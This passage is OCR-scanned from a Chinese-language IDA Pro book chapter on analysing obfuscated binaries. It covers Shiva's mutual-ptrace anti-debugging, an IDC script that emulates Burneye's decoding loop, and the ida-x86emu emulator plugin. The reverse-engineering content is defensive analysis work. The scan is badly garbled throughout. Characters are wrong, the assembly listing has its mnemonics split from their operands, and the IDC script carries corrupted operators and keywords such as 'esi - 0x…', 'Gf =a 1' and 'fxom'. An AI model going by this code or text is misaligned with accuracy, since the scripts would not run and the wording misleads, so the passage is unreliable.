COU ETHER EL OO BED UBI. BE B BE B EB BE EH DCH TE TE OD O 


(D 参见 http://www.symantec.com/connect/articles/windows-anti-debug-reference., 
(2) 参见 http://pferrie.tripod.com/papers/unpackers.pdf/ (作者 : Peter Ferrie )。 
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Shiva 利用 了 这 一 点 : 任何 时 候 ， 一 个 进程 只 能 依附 一 个 其 他 进程 。 在 执行 早期 ，Shiva 进程 
会 进行 分 支 ， 创 建 自己 的 一 个 副本 。 然 后 ， 原 始 的 Shiva 进程 立即 对 新 分 支 的 子 进程 执行 进程 跟 
踪 依 附 操 作 。 反 过 来 ,新 分 文 的 子 进程 也 立即 依附 到 它 的 父 进 程 上 。 如 采 其 中 的 一 个 依附 操作 失 
Wr, Shiva 会 认为 另 一 个 调试 器 被 用 于 监控 它 的 进程 ， 它 会 立即 终止 。 如 果 这 两 个 依附 操作 都 取 
得 成 功 ， 则 说 明 没 有 其 他 调试 需 能 够 依附 到 正在 运行 的 Shiva 进程 对 上 ，Shiva 将 继续 运行 ， 而 
不 用 担心 被 监视 。 以 这 种 方式 运行 时 , 任何 一 个 Shiva 进程 都 可 以 修改 另 一 个 进程 的 状态 , 因此 ， 
使 用 静态 分 析 技 巧 很 难 确定 Shiva 二 进 制 文 件 的 真实 控制 流 路 径 。 
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到 现在 为 止 , 你 可 能 会 感到 困惑 ， 有 了 所 有 这 些 反 逆向 工程 技巧 ,我们 该 如 何 分 析 程 序 员 硕 
望 使 其 保持 隐秘 的 软件 呢 ? 由 于 这 些 技巧 同时 针对 静态 分 析 工 具 和 动态 分 析 工 具 , 要 揭示 一 个 程 
序 的 隐藏 行为 , 什么 才 是 最 佳 办 法 呢 ? RRE, 能够 满足 一 切 需求 的 解决 方案 并 不 存在 。 许 多 
时 候 , 解决 方案 取决 于 你 掌握 的 技能 以 及 你 使 用 的 工具 。 如 采 你 选择 的 分 析 工 具 是 调试 逢 ,那么 
你 需要 制订 策略 ， 避 开 调 试 硕 检测 和 预防 保护 。 如 琳 你 的 首选 分 析 工 具 是 反 谍 编 桌 ， 那么 你 需要 
制订 策略 ， 获 得 一 个 准确 的 反 汇 编 代码 清单 ; 如 果 遇 到 自修 改 代码 ， 你 还 需要 模拟 这 段 代 码 的 行 
为 ， 以 便 正确 更 新 反 汇 编 代码 清单 。 

在 这 一 市 中 ,我 们 将 讨论 两 种 在 静态 分 析 环 境 (也 就 是 说 ,不 运行 代码 ) 中 处理 日 修改 代码 
的 技巧 。 在 使 用 调试 融 控 制 一 个 程序 时 ， 如 采 你 不 愿 〈 因 为 恶意 代码 ) 或 无 法 ( 因为 缺少 人 硬件 ) 
分 析 这 个 程序 ， 这 时 静态 分 析 可 能 是 你 的 唯一 选择 。 


21.3.1 面向 脚本 的 去 模糊 


H IDA 可 用 于 反 汇 编 为 各 种 CPU 开发 的 二 进 制 文件 ， 因 此 ， 你 常常 需要 分 析 一 个 为 截然 
不 同 的 平台 (而 非 你 运行 IDA 的 平台 ) 开 发 的 二 进 制 文 件 。 例 如 , 你 可 能 需要 分 析 一 个 Linux x86 
二 进 制 文件 ,即使 你 碰巧 运行 的 是 Windows 版 本 的 IDA ,或 者 你 可 能 需要 分 析 一 个 MIPS 或 ARM 
二 进 制 文件 ， 即 使 IDA 仅 在 x86 平台 上 运行 。 这 时 候 ， 你 也 许 无 法 获得 适合 对 提供 给 你 的 二 进 
制 文件 执行 动态 分 析 的 动态 分 析 工 具 ， 如 调试 器 。 而 且 ， 如 果 通 过 对 程序 的 组 成 部 分 进行 编码 来 
模糊 处 理 这 个 二 进 制 文件 ， 那 么 你 可 能 别 无 选择 ， 只 有 创建 一 个 IDA 脚本 ， 模 拟 程序 的 去 模糊 
过 程 ， 以 正确 对 程序 进行 解码 ， 并 正确 反 汇 编 解 码 后 的 指令 和 数据 。 

这 似乎 是 一 个 烦琐 的 任务 ,但 许多 时 候 , 在 模糊 程序 的 解码 阶段 ， 你 只 需要 利用 处 理 融 的 一 
小 部 分 指令 集 。 因 此 ， 和 擎 握 必 要 的 操作 ， 并 不 要 求 你 理解 目标 CPU 的 整个 指令 集 。 

在 第 15 草 中 ， 我 们 提供 了 一 个 算法 ， 用 于 开发 脚本 ， 模 拟 一 个 程序 各 种 部 分 的 行为 。 在 下 
面 的 例子 中 , 我 们 将 利用 那些 步骤 开发 一 个 简单 的 IDC 脚本 , 解码 一 个 已 经 使 用 Burneye ELF 加 
密 工 具 加 蜜 的 程序 。 示 例 程序 从 代码 清单 21-2 中 的 指令 开始 执行 。 


代码 清单 21-2  Burneye 启动 顺序 和 模糊 代码 


LOAD:05371035 start proc near 
LOAD: 05371035 
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@ LOAD:05371035 push ` off 5371008 
© LOAD:0537103B pushf 
© L0OAD:0537103C pusha 
© LOAD:0537103D mov ecx, dword 5371000 
LOAD: 05371043 jmp loc_5371082 
LOAD:05371082 loc_5371082: ; CODE XREF: Start+E 个 ] 
© LOAD:05371082 call sub_5371048 
LOAD:05371087 sal byte ptr [ebx-2Bh], 1 
LOAD:0537108A pushf 
LOAD 05371008B xchg al, [edx-11h] 
LOAD:0537108E pop SS 
LOAD:0537108F xchg eax, esp 
LOAD:05371090 cwde 
LOAD:05371091 aad 8Eh 
LOAD: 05371093 push eCX 
Q LOAD:05371094 out dx, eax 
LOAD:05371095 add [edx-57E411A0h], bh 
LOAD:0537109B push SS 
LOAD:0537109C ICI dword ptr [esi«oCh], cl 
LOAD: 0537109F push CS 
LOAD:053710A0 sub al, 70h 
LOAD:053710A2 cmp ch, [eax«6Eh] 
LOAD: 053710A5 cmp dword ptr ds:0CBD35372h, 9C38A8BCh 
LOAD:053710AF and al, OF4h 
@ LOAD:053710B1 db 67h 








这 个 程序 首先 将 内 存 位 置 05371008h 的 内 容 压 人 栈 ( @ ), 然后 压 人 CPU 标志 CO), 接 下 来 
EAMA CPU 寄存 需 〈 和 目 )。 起 初 ， 这 些 指令 的 目的 并 不 明显 ， 因 此 ， 我 们 把 这 些 信息 记录 下 来 
以 备 后 用 。 下 一 步 ，ECX 寄存 器 将 与 内 存 位 置 5371000h 的 内 容 一 同 加 载 (@ )。 根 据 在 第 15 章 
中 介绍 的 算法 ,这 时 我 们 需要 声明 一 个 名 为 ecx 的 变量 , 并 使 用 IDC 的 Dword 函数 对 它 进行 初始 
化 ， 如 下 所 示 : 














auto ecx; 
ecx = Dword(0x5371000); //from instruction 0537103D 





在 一 个 绝对 跳 转 之 后 ， 程 序 调用 也 数 sub 5371048( @ )， 这 个 操作 会 产生 一 个 副作用 ; 将 地 
HE 05371087h (返回 地 址 ) 压 人 栈 。 注意 ，call 指令 之 后 经 过 反 汇 编 的 指令 变 得 越 来 越 没 有 意义 。 
通常 ， 在 用 户 空 间 代 码 中 并 不 会 看 到 out 指令 (9), Tfi] IDA 也 无 法 反 汇 编 地 址 053710B1h ( 9 ) 
处 的 一 条 指令 。 这 些 都 说 明 这 个 二 进 制 文件 存在 问题 (而且 事 实 上 “也 数 ”窗口 中 仅 列 出 两 个 也 
数 )。 

这 时 ， 分 析 需 要 从 函数 sub 5371048 处 继续 进行 ， 如 代码 清单 21-3 所 示 。 


代码 清单 21-3 ”主要 的 Burneye ff f EI Sir 


LOAD:05371048 sub 5371048 proc near ; CODE XREF: start:loc 5371082Y/p 
€ L0AD:05371048 pop esi 
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 LOAD:05371049 mov 
 L0OAD:0537104B mov 
LOAD:05371051 Or 
© LOAD:05371053 jz 
© LOAD:05371059 Xor 
Q LOAD:0537105B loc 537105B: 
LOAD:0537105B mov 
@ L0AD:05371060 loc 5371060: 
LOAD:05371060 shrd 
LOAD:05371064 shr 
LOAD: 05371066 jnb 
LOAD: 0537106C Xor 
LOAD:05371072 loc 5371072: 
LOAD:05371072 dec 
LOAD: 05371073 jnz 
LOAD:05371075 shr 
LOAD:05371078 lodsb 
LOAD:05371079 xor 
LOAD:0537107B stosb 
LOAD:0537107C dec 
LOAD: 0537107D jnz 
LOAD:0537107F loc 537107F: 
LOAD:0537107F popa 
LOAD: 05371080 popf 
LOAD:05371081 retn 


经 过 仔细 分 析 ， 我 们 发 现 ， 这 并 不 是 


edi, esi 
ebx, dword 5371004 
ebx, ebx 
loc 537107F 
edx, edx 
; CODE XREF: sub 5371048*35v/j 
eax, 8 
; CODE XREF: sub 5371048*2BY/j 
edx, ebx, 1 
ebx, 1 
loc 5371072 
ebx, 0C0000057h 
; CODE XREF: sub 5371048+1E 个 ] 
eax 
short loc 5371060 
edx, 18h 


al, dl 
ecx 


short loc 537105B 
; CODE XREF: sub 5371048+B 个 j 





FI EDX ( 0) 的 初始 化 ,我 们 得 到 如 下 脚本 : 


auto ecx, esi, edi, ebx, edx; 


ecx = Dword(0x5371000);  //from instruction 0537103D 


esi - 0x05371087; //from instruction 05371048 
edi - esi; //from instruction 05371049 
ebx = Dword(0x5371004);  //from instruction 0537104B 
edx = 0; //from instruction 05371059 
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-个 常见 的 函数 ， 因 为 它 一 开始 就 将 返回 地 址 弹出 栈 ， 
放 和 人 ESI 寄存 器 中 ( @ )。 如 前 所 述 , 保存 的 返回 地 址 为 05371087h ,考虑 到 EDI(@)、EBX(@) 


在 这 些 初 娘 化 之 后 ， 隆 数 对 包含 在 EBX 寄存 融 中 的 值 进行 测试 ( @ ), 然后 进入 一 个 外 层 循 
环 (@ ) 和 一 个 内 层 循环 ( @ )。 这 个 国 效 的 剩余 逻辑 包含 在 下 面 的 完整 脚本 中 。 在 这 段 脚本 内 ， 
注释 用 于 将 脚本 操作 与 前 面 一 个 反 汇 编 代码 清单 中 对 应 的 操作 关联 起 来 。 








auto ecx, esi, edi, ebx, edx, eax, cf; 


ecx = Dword(0x5371000);  //from instruction 0537103D 


esi - 0x05371087; //from instruction 05371048 

edi - esi; //from instruction 05371049 

ebx = Dword(0x5371004);  //from instruction 0537104B 

if (ebx !- 0) { //from instructions 05371051 and 05371053 
edx = 0; //from instruction 05371059 


do { 
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eax = 8; //from instruction 0537105B 

do { 
//IDC does not offer an equivalent of the x86 shrd instruction so we 
//need to derive the behavior using several operations 


d edx = (edx >> 1) & Ox7FFFFFFF; ` //perform unsigned shift right one bit 
Cf = ebx & 15 //remember the low bit of ebx 
if Gf =a 1){ //cf represents the x86 carry flag 
edx = edx | 0x80000000; //shift in the low bit of ebx if it is 1 


j 
ebx = (ebx >> 1) & Ox7FFFFFFF; //perform unsigned shift right one bit 


if (ET == 1) { //fxom instruction 05371066 
ebx = ebx ^ 0xC0000057; //fxom instruction 0537106C 
j 
eax--; //from instruction 05371072 
) while (eax != 0); //from instruction 05371073 
o edx - (edx »» 24) & OxFF; //perform unsigned shift right 24 bits 
e eax = Byte(esi++); //from instruction 05371078 
eax = eax ^ edx; //from instruction 05371079 
o PatchByte(edi++, eax); //from instruction 0537107B 
ecx--; //from instruction 0537107C 
} while (ecx != 0); //fxom instruction 0537107D 


j 


这 个 例子 有 两 个 细微 的 变化 。 首 先 ，IDC 中 的 右 移 位 运算 符 (>> ) 执行 有 符号 移 位 (表示 符 
号 位 被 复制 到 最 高 有 效 位 中 )， 而 x86 shr 和 shrd 指令 执行 无 符号 移 位 。 为 了 模拟 IDC 中 的 一 个 
无 符号 右 移 位 ,我 们 必须 清除 从 左边 移入 的 所 有 位 , 如 O@ 和 @ 所 示 。 其 次 ,为 了 正确 执行 x86 1odsb 
( 加 载 字 符 串 字 市 ) 和 stosb ( 存储 字符 串 字 市 ) 指令 , 我们 需要 选择 合适 的 数据 大 小 和 变量 。 这 
些 指令 在 EAX 寄存 器 的 低 8 位 "中 读 取 (1odsb ) 和 写 入 (stosb ) 数据 , 让 较 高 的 24 位 保持 不 变 。 
在 DC 中 ,我们 没有 办 法 将 一 个 变量 划分 成 很 小 的 部 分 ， 除 非 使 用 各 种 按 位 运算 屏蔽 并 重新 组 
合 这 个 变量 的 各 个 部 分 。 具 体 来 说 ， 就 1odsb 指令 而 言 ， 有 一 个 更 加 可 信 的 模拟 ， 如 下 所 示 : 














eax = (eax & 0xFFFFFF00) | (Byte(esi++) & OxFF); 


这 个 例子 先 清 除 EAX 变量 的 低 8 位 ,然后 使 用 一 个 OR 运算 合并 低 8 位 中 的 新 值 ,在 Burneye 
解码 示例 中 ， 我 们 注意 到 一 个 事实 在 每 个 外 层 循环 开始 时 ， 整 个 EAX 寄存 需 被 设置 为 8， 这 
样 做 会 将 EAX 的 高 24 位 清 零 。 因 此 , 我 们 选择 忽略 它 对 EAX 高 24 位 的 赋值 效果 , fE 10dsb 
的 实现 ( @ )。 同 时 ， 我 们 不 需要 考虑 stosb 的 实现 (@ )， 因 为 PatchByte 函数 仅 读 取 它 的 输入 
值 (这 里 为 EAX BM 8 位。 

执行 Burneye 解码 IDC 脚本 后 , 我 们 的 数据 库 将 反映 出 所 有 变化 。 正常 情况 下 ,除非 模糊 程 
序 在 Linux 系统 上 运行 ， 否 则 这 些 变化 将 不 可 见 。 如 果 去 模糊 过 程 得 以 正确 执行 ， 我 们 很 可 能 会 
在 IDA 的 “字符 串 ” 窗 口中 看 到 许多 更 具 可 读 性 的 字符 串 。 为 了 观察 这 一 事实 ， 需 要 关闭 并 重 
新 打开 “字符 串 ” 窗 口 ， 或 者 在 窗口 中 右 击 光标 ， 选 择 Setup， 然 后 单 击 OK， 刷 新 这 个 窗口 的 














D EAX FARAR 8 位 也 叫做 AL 寄存 带 。 
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内 容 。 这 两 个 操作 都 会 使 DA 重新 扫描 数据 库 ， 从 中 搜索 字符 串 内 容 。 

剩 下 的 任务 包括 : 如 果 返 回 函 数 在 它 的 第 一 条 指令 中 就 弹出 返回 地 址 ,确定 它 将 在 什么 地 方 
返回 ; 使 IDA 根据 情况 将 解码 后 的 字 节 值 正 确 显示 为 指令 或 数据 。Burneye 解码 函数 的 最 后 3 条 
HA I FIR: 











LOAD: 0537107F popa 
LOAD :05371080 popft 
LOAD :05371081 retn 


如 前 所 述 ， 这 个 函数 首先 弹出 它 的 返回 地 址 ， 这 意味 着 剩余 的 栈 值 由 调用 方 设置 。 这 里 使 用 
的 popa 和 popf 指令 与 Burneye 的 启动 例 程 开始 部 分 使 用 的 pusha 和 pushf 指令 对 应 ,如 下 所 示 : 


LOAD:05371035 start proc near 
LOAD:05371035 

@ LOAD:05371035 push ` off 5371008 
LOAD: 0537103B pushf 
LOAD:0537103C pusha 





结 采 栈 上 剩 下 的 唯一 一 个 值 是 在 start 的 第 一 行 代码 〈@ ) 中 压 入 的 地 址 。Burneye 解码 例 
程 会 返回 到 这 个 地 址 ， 深 入 分 析 Burneye 保护 的 二 进 制 文件 也 需要 从 这 个 地 址 继续 。 

从 前 面 的 例子 来 看 , 编写 一 段 脚 本 解码 或 解压 模糊 二 进 制 文件 , 似乎 是 一 个 相对 容易 的 事情 。 
就 Burneye 而 言 , 情况 确实 如 此 , 因为 Burneye 并 没有 使 用 特别 复杂 的 模糊 算法 。 但 是 , 使 用 IDC 
执行 更 加 复杂 的 实用 工具 (如 ASPack F Glock ) 的 去 模糊 存根 ， 你 可 能 需要 付出 更 大 的 努力 。 

基于 脚本 的 去 模糊 的 优点 包括 : 你 根本 不 需要 执行 你 所 分 析 的 二 进 制 文件 ; 不 需要 完全 了 解 
用 于 去 模糊 二 进 制 文件 的 具体 算法 ， 你 就 可 以 创建 一 个 有 效 的 脚本 。 后 一 个 说 法 似乎 有 些 了 矛盾 ， 
因为 你 只 有 完全 理解 去 模糊 算法 ， 才 能 使 用 一 个 脚本 模拟 这 个 算法 。 但 是 ， 利 用 这 里 和 第 15 草 
描述 的 脚本 开发 流程 ， 你 只 需要 完全 理解 去 模糊 过 程 使 用 的 每 一 条 CPU 指令 。 通 过 使 用 IDC 忠 
实地 执行 每 一 项 CPU 操作 ， 并 且 根 据 反 汇编 代码 清单 排 定 每 项 操作 的 正确 顺序 ， 你 将 有 一 段 能 
够 模拟 程序 操作 的 脚本 ， 即 使 你 并 不 完全 理解 这 些 操作 作为 整体 执行 的 高 级 算法 。 

使 用 基于 脚本 的 方法 的 缺点 在 于 ， 你 编写 的 脚本 往往 相当 死板 。 如 果 由 于 去 模糊 工具 升级 ， 
或 者 由 于 去 模糊 工具 使 用 了 其 他 的 命令 行 设 置 , 那么 , 之 前 对 这 个 工具 有 将 的 脚本 可 能 需要 进行 
相应 的 修改 。 例 如 ， 你 可 以 开发 出 一 个 通用 解压 脚本 ， 供 使 用 UPX 打包 的 二 进 制 文件 使 用 ", 但 
是 ， 随 着 UPX 不 汤 升 级 ， 你 需要 对 这 上段 脚本 持续 调整 。 

最 后 , 使 用 基于 脚本 的 去 模糊 方法 无 法 构建 “万 能 药 ” 式 的 去 模糊 解决 方案 。 没 有 任何 一 个 
脚本 能 够 对 所 有 的 二 进 制 文件 去 模糊 。 从 某 个 角度 说 ,基于 脚本 的 去 模糊 方法 与 基于 签名 的 人 侵 
检测 和 反 病 毒 系统 有 许多 相同 的 缺点 。 你 必须 为 每 一 个 新 型 包装 右 开 发 一 个 新 的 脚本 , 现 有 包装 
顺 的 任何 细微 变化 都 可 能 会 使 现 有 的 脚本 失效 。 












































CD 相关 示例 参见 http://www.idabook.com/examples/chapter21。 
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21.3.2 面向 模拟 的 去 模糊 


在 创建 脚本 执行 去 模糊 任务 时 ， 我 们 总 是 需要 模拟 一 个 CPU 的 指令 集 ， 以 与 被 去 模糊 的 程 
序 在 行为 上 保持 完全 一 致 。 如 采 我 们 有 一 个 指令 模拟 融 , 那么 我 们 可 以 将 这 些 脚本 执行 的 一 些 或 
全 部 工作 转交 给 模拟 硕 完 成 ， 从 而 大 大 缩短 对 一 个 IDA 数据 库 去 模糊 所 需 的 时 间 。 模 拟 禹 能够 
填补 脚本 与 调试 可 之 间 的 空 掉 ， 它 不 但 比 脚 本 更 加 高 效 ， 而 且 比 调试 硕 更 加 灵活 。 例 如 ， II 
拟 器 , 我 们 可 以 模拟 一 个 在 x86 平 台 上 运行 的 MIPS 二 进 制 文件 , 或 者 模拟 一 个 在 Windows 平台 
上 运行 的 Linux ELF 二 进 制 文件 的 指令 。 

模拟 需 的 复杂 程度 各 不 相同 。 不 过 ,模拟 顺 至 少 需要 一 些 指 令 字 节 和 足够 的 内 存 , 专门 供 栈 
操作 和 CPU 寄存 可 使 用 。 更 加 复杂 的 模拟 顶 则 可 以 利用 模拟 化 的 硬件 设备 和 操作 系统 服务 。 

IDA 并 不 提供 本 地 模拟 工具 "， 但 是 ， 它 的 插件 体系 结构 功能 相当 强大 ， 能 够 创建 模拟 器 类 
型 的 插件 。 实 现 这 类 模拟 器 的 一 种 方法 是 将 IDA 数据 库 作为 碰巧 包含 我 们 希望 模拟 的 二 进 制 文 
件 〈 通 过 加 载 硕 模块 的 帮助 ) 的 虚拟 内 存 处 理 。 模 拟 融 插件 所 需要 做 的 是 提供 少量 内 存 ， 跟 踩 所 
有 CPU 寄存 融 的 状态 ， 同 时 提供 较 大 数量 的 内 存 ， 同 时 提供 某 种 用 于 实施 栈 的 方法 。 实 施 栈 的 
一 种 方法 是 在 映射 到 适合 栈 的 位 置 的 数据 库 中 创建 一 个 新 段 。 模 拟 需 通过 从 模拟 怖 指令 指针 的 当 
前 值 指定 的 数据 库 位 置 读 取 字 节 ， 并 根据 被 模拟 CPU 的 指令 集 规 范 解 码 读 取 到 的 值 ， 同 时 更 新 
任何 受 已 解码 的 指令 影响 的 内 存 值 ， 从 而 执行 它 的 操作 。 可 能 的 更 新 包括 修改 模拟 的 注册 表 仁 ， 
将 这 些 值 存储 到 模拟 的 栈 内 存 空间 中 , 或 者 根据 已 解码 的 指令 生成 的 内 存 地 址 , 将 经 过 修改 的 但 
补 缀 到 IDA 数据 库 的 数据 或 代码 段 。 控 制 模拟 闪 的 方式 与 控制 调试 硕 类 做， 因为 你 同样 可 以 逐 
步 执行 每 条 指令 ， 检 查 内 存 ， 修 改 寄存 天 以 及 设置 新 点 。 程 序 内 存 空 间 中 的 内 容 将 在 IDA 的 反 
汇编 代码 清单 和 十 六 进 制 窗 口中 显示 ， 而 模拟 各 需要 为 CPU 寄存 硕 生 成 目 己 的 显示 。 

使 用 这 样 的 模拟 顶 ,我 们 可 以 在 程序 的 入 口 点 开始 模拟 , 并 逐步 模拟 去 模糊 阶段 的 所 有 指令 ， 
从 而 对 一 个 模糊 程序 进行 去 模糊 处 理 。 因 为 这 种 模拟 顶 将 数据 库 作 为 它 的 备用 存储 名 ,因此 , 所 
有 目 修 改 将 立即 在 数据 库 中 反映 出 来 。 到 去 模糊 过 程 完 成 时 ,数据库 将 被 正确 转换 成 程序 的 去 模 
糊 版 本 ,就 好 像 程 订 一 下 在 调试 各 的 控制 下 运行 一 样 。 与 调试 相 比 , 模拟 的 一 个 明显 优点 在 于 模 
拟 右 绝 不 会 执行 潜在 恶意 的 代码 , 而 调试 副 辅 助 的 去 模糊 必须 至 少 执 行 恶 总 程序 的 某 个 部 分 , 才 
能 获得 该 程序 的 去 模糊 版 本 。 

ida-x86emu ( x86emu ) 插件 〈 见 表 21-1) 就 是 一 个 这 样 的 模拟 需 搬 件 ， 可 用 于 模拟 大 部 分 的 
x86 指令 集 。 这 个 插件 为 开源 插件 ， 并 使 用 自 4.9 版 以 来 的 所 有 IDASDK 版 本 构建 。 这 个 插件 适 
HF DA 所 有 版 本 的 二 进 制 版 本 包含 在 x86emu 发 行 版 中 ,这 个 插件 供 Windows GUI 版 本 的 IDA 
或 Qt 版 本 的 IDA 使 用 ,同时 提供 构建 脚本 ,允许 用 户 使 用 MinGw( g++/make Jit Visual Studio 
2008) 工具 构建 相应 的 插件 。 该 插件 的 Qt 版 本 与 Linux 版 本 的 IDA 和 OS X UH IDA 兼容 。 
除了 与 你 的 IDA 版 本 对 应 的 SDK 外 ， 使 用 这 个 插件 没有 其 他 别 的 要 求 。 要 安装 这 个 插件 ， 可 以 
将 已 编译 的 插件 二 进 制 文件 ( x86emu.plw/x86emu-qt.plw ) 复制 到 <IDADIR>/plugins 目录 中 。 













































































(DIDA 上 自 带 有 能 够 通过 IDA 的 调试 界面 与 开源 Bochs 模拟 需 交 互 的 插件 。 有 关 详 细 信息 ， 参 见 第 24 章 至 第 26 章 。 
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表 21-1 ida-x86emu 插件 


名 称 ida-x86emu 

作者 Chirs Eagle 

发 布 用 于 SDK v6.1 的 源 代码 及 用 于 自 5.0 以 来 的 所 有 IDA 版 本 (包括 IDA 免费 版 本 ) 的 二 进 
制 文件 。 源 代码 向 后 兼容 到 SDK 4.9 版 

价格 免费 

说 明 IDA LAUR x86 指令 模拟 器 

言 息 http://www.idabook.com/1da-x86emu 


你 不 需要 进行 插件 配置 ，x86emu 插件 默认 使 用 ALT-FS 热 键 组 合 激活 。 你 只 能 对 使 用 x86 
处 理 硕 的 二 进 制 文件 激活 这 个 插件 。 这 个 插件 可 用 于 任何 类 型 的 二 进 制 文件 ,如 PE. ELF 和 
Mach-O。 使 用 第 17 章 讨 论 的 工具 (Visual Studio 或 MinGW 的 gce 和 make )， 我 们 可 以 由 源 代 
码 构建 这 个 插件 。 

1. x86emu 初始 化 

激活 x86emu 插件 后 ,该 插件 的 控制 对 话 框 将 显示 出 来 ， 如 图 21-4 所 示 。 对 话 框 的 基本 显示 
包括 寄存 硕 内 容 ， 还 有 控制 按钮 ， 用 于 执行 测 单 的 模拟 任务 ， 如 控制 模拟 融 或 修改 数据 信 。 


x86 Emulator - thread Ode (main) E x] 


Fie " Edit " View Y Emulate Y Functions Y 
step | Run ta cursar | 
[ox0co00000 EBP [0x0012rrr0 
Skip | Jump to cursor | 


[ox7zrprooo | ESP[oxoo:izr9&5C ` ` 

Eon ` Cem | 
EDX |oxocoooooo `  EDri[oxooooecco ` ` Segments | 
EFLAGS[0x0c003202 | EIP [oxoosos760 | set Memory | Push data | 








Registers 











图 21-4. x86emu 模拟 融 控制 对 话 框 
一 旦 激活 后 ， 搬 件 将 执行 许多 其 他 操作 。 模 拟 需 将 为 所 有 文件 类 型 创建 名 为 .Stack 和 .heap 





的 新 数据 库 段 , 为 模拟 程序 的 操作 提供 运行 时 内 存 文 持 , 在 某 个 二 进 制 文件 中 第 一 次 激活 插件 时 ， 
当前 的 光标 位 置 用 于 初始 化 指令 指针 (EIP ), 对 于 Windows PE 二 进 制 文件 , 该 插件 执行 以 下 任务 。 

(1) 创建 另外 一 个 名 为 .headers 的 程序 段 ， 重 新 读 取 输入 的 二 进 制 文件 ， 然 后 将 MS-DOS 和 
PE 头 部 字 节 加 载 到 数据 库 中 。 

(2) 分 配 内 存 ， 模 拟 一 个 线程 环境 块 (TEB ) 和 一 个 进程 环境 块 (PEB )。 用 合理 的 值 填 充 这 
些 结构 ， 让 被 模拟 的 程序 确信 ， 它 在 真正 的 Windows 环境 中 运行 。 

(3) 为 x86 段 寄存 右 分 配合 理 的 值 , 配置 一 个 虚假 的 中 断 描述 符 表 , 提供 最 小 的 异常 处 理 功能 。 

(4) Ze PE 文件 的 导入 目录 中 和 定位 所 有 被 引用 的 DLL。 对 于 每 一 个 被 发 现 的 DLL, EU 
器 将 在 数据 库 中 为 它们 创建 额外 的 段 , 并 加 载 该 DLL 的 头 部 和 导出 目录 。 然 后 , 用 从 已 加 载 DLL 
的 信息 中 获得 的 函数 地 址 填充 二 进 制 文件 的 性 入 表 。 注 意 , 已 导入 的 DLL 中 没有 任何 代码 被 加 
载 到 数据 库 中 。 
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每 次 保存 或 关闭 数据 库 时 ,插件 的 当前 状态 ( 寄存 器 值 ) 被 保存 在 一 个 网 络 市 点 中 。 其 他 内 
存 状态 ( 如 栈 值 和 堆 值 ) 也 被 保存 下 来 , 因为 这 些 值 存储 在 数据 库 的 专用 段 内 。 随后 激活 插件 时 ， 
将 从 现 有 的 网 络 市 点 数据 恢复 模拟 带 状 态 。 

2. 基本 的 x86emu 操作 

檬 拟 妖 控制 对 话 框 专门 提供 与 基本 调试 带 非 常 类 似 的 功能 。 在 你 想 要 修改 的 寄存 帮 的 编辑 框 
中 输入 一 个 新 值 ， 即 可 修改 CPU 寄存 妖 的 内 容 。 

Step 按钮 用 于 模拟 单独 一 条 指令 。 从 EP 寄存 融 指 定 的 数据 库 位 置 谈 取 一 个 或 数 个 字 节 ,并 
执行 这 些 指令 字 市 指定 的 操作 ， 即 可 模拟 一 条 指令 。 在 必要 时 ， 寄存 带 显 示 的 值 会 更 新 ,以 反映 
为 模拟 当前 指令 而 导致 的 变化 。 每 次 单 击 Step 按钮 ， 模拟 各 一 定 会 以 代码 (而 非 数 据 ) 显示 
EIP 指定 的 地 址 处 的 字 节 。 这 一 特性 有 助 于 阻止 指令 流 中 的 任何 去 同步 操作 。 此 外 ， 模 拟 融会 使 
有 反 汇 编 显 示 窗 口 跳 转 到 EIP 指定 的 位 置 ， 以 跟踪 每 一 条 被 模拟 的 指令 。 

Run to cursor 按钮 用 于 模拟 连续 的 几 条 指令 。 模 拟 从 当前 EP 位 置 开 始 ， 直 到 到 达 一 个 
Ires zx EIP 等 于 当前 光标 位 置 时 结束 。 模 拟 硕 用 于 识别 通过 IDA 的 调试 带 界 面 ( 右 击 指定 的 
地 址 并 选择 Add breakpoint ) 或 模拟 硕 目 己 的 断 点 界面 (Emulate » Set Breakpoint ) ix EB Wr 
VS, 









































x86emu Dr à 


CO O E O E E G v0 s BO BH BL BT BE HET BIET HE LEE DII EL BELLE HB HEIDE a E UT [B 
让 
EL E E IET (EI DO. ELI DI OLEI DI EIL IB EL (E BEBE OD B BET HDD CDD OPO OIDOD OI 
UgaguuulutututtLutLt 


选择 Run to cursor 按钮 后 ,模拟 需 并 不 会 暂停 以 为 每 一 条 获取 的 指令 重新 格式 化 反 汇 编 代 码 
清单 。 它 只 格式 化 第 一 条 和 最 后 一 条 被 执行 的 指令 。 对 于 较 长 的 指令 序列 ， 重新 格式 化 每 条 指令 
的 反 汇 编 代 人 码 清 单 所 导致 的 开销 将 使 模拟 硕 的 性 能 低 得 令 人 难以 恳 受 。 因 此 ， 在 使 用 Run To 
Cursor 命令 时 ， 你 应 当 十 分 小 心 ， 因 为 在 EP 到 达 光 标 位 置 之 前 ， 你 将 无 法 重新 控制 模拟 需 〈 和 
IDA )。 如 果 由 于 某 种 原因 ， 执 行 从 未 触发 断 点 或 到 达 光 标 位 置 ， 你 可 能 需要 强制 终止 IDA, 3X 
可 能 会 导致 你 之 前 所 做 的 重要 工作 被 白 日 浪费 。 

Skip 按钮 用 于 使 模拟 需 略 过 一 条 指令 ， 而 不 模拟 这 条 指令 。 例 如 ， 你 可 以 使 用 Skip TEA 
略 一 个 条 件 跳 转 而 到 达 一 个 特定 的 代码 块 , 不 顾 任何 条 件 标 志 的 状态 。Skip e nf HT We eis] 
用 ,如 导入 的 库 函 数 ， 因 为 你 无 法 檬 拟 它 的 代码 。 如 果 你 选择 略 过 某 个 函数 调用 ,请 确保 对 数据 
库 进 行 更 新 ， 以 反映 该 因数 可 能 做 出 的 任何 更 改 。 此 类 更 改 的 示例 包括 : 修改 EAX 的 值 以 反映 
所 需 的 函数 返回 值 ， 或 者 填充 其 地 址 已 传递 给 函数 的 缓冲 区 。 此 外 ， 如 果 被 略 过 的 吨 数 使 用 
stdcall 调用 约定 ,你 还 应 当 根 据 被 略 过 的 函数 在 返回 时 从 栈 中 清除 的 学 市 数 ， 小 心 对 ESP 进行 
手动 调整 。 

Jump to cursor 按钮 将 使 EIP 更 新 为 当前 光标 所 在 位 置 的 地 址 。 这 个 特性 可 用 于 忽略 整个 代码 
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块 。 如 果 CPU 标志 的 状态 不 会 对 跳 转 造成 影响 ,该 特性 还 可 用 于 跟踪 一 个 条 件 跳 转 。 记 住 ， 在 一 
个 函数 内 跳 转 可 能 会 影响 栈 布 局 ( 例如， 如 果 你 忽略 压 入 操作 或 栈 指 针 调 整 )， 导致 无 法 预料 的 后 
